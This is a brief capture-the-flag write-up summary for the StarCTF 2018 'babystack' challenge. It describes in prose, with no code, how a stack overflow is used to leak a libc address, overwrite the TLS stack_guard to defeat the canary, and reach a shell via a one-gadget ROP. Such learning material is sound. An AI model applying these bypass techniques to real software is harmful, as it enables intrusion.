In StarCTF 2018 - babystack challenge, there is a stack overflow vulnerability by which we can leak atol@GOT address to find libc base address, and jump to one gadget in order to execute execve("/bin/sh"). The interesting part is replacing the stack canary with the correct value in order to replace the return address without crashing the program.
Basically, when using pthread, the Thread Local Storage (TLS) will be located somewhere near the thread stack, so it can be overwritten in case of a stack overflow vulnerability. In this challenge, we can replace the stack_guard attribute in TLS (http://www.openwall.com/lists/oss-security/2018/02/27/5) with an arbitrary value in order to bypass canary protection. This is an interesting ROP challenge to learn bypassing protections like NX, Canary, Full RELRO, and ASLR in x86_64 binaries.